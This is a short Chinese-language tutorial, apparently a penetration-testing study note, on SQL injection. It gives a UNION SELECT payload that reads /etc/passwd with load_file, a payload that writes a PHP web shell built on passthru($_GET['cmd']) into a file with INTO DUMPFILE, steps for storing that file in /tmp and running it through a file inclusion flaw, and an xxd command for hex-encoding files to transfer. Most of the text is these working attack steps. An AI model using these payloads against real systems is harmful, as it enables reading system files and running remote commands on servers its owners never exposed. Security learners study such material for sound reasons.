上篇主要概述了查詢一些常見表格的方法 這里在增加一些查詢的方式
讀取文件:
'union select null,load_file('/etc/passwd')--

寫入文件
結合上面,我們可以寫入一個文件在目標路徑
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "a.php" --
這里的 <?php passthru($_GET['cmd']); ?>為我們要執行的命令,
INTODUMPPFILE為我們創建的一個文件a.php

但是這里我們寫入的地址明顯是 網頁默認存放的路徑,這個路徑是無法執行,我們要做的就是講文件放置可以執行的路徑下,接着執行此php文件。
結合我們之前提過的文件包含漏洞,可以對其php文件進行存儲加執行
在存儲的路徑選擇上,tmp路徑是不錯的選擇,此文件路徑屬於多個賬號可以執行的路徑

接着我們利用之前利用過的文件包含漏洞進行文件的執行

思路總結:利用系統的中間路徑,將文件寫入,然后利用其它漏洞將文件進行執行,這里結合了文件包含以及文件寫入漏洞,漏洞利用成功
補充:如果我們需要將傳輸的文件以二進制的方式進行傳輸需要在kali中用
cat 目標文件 | xxd -ps | tr -d '\n'
xxd -ps轉換為二進制,后面tr是將換行符去掉,將所有代碼匯總為一行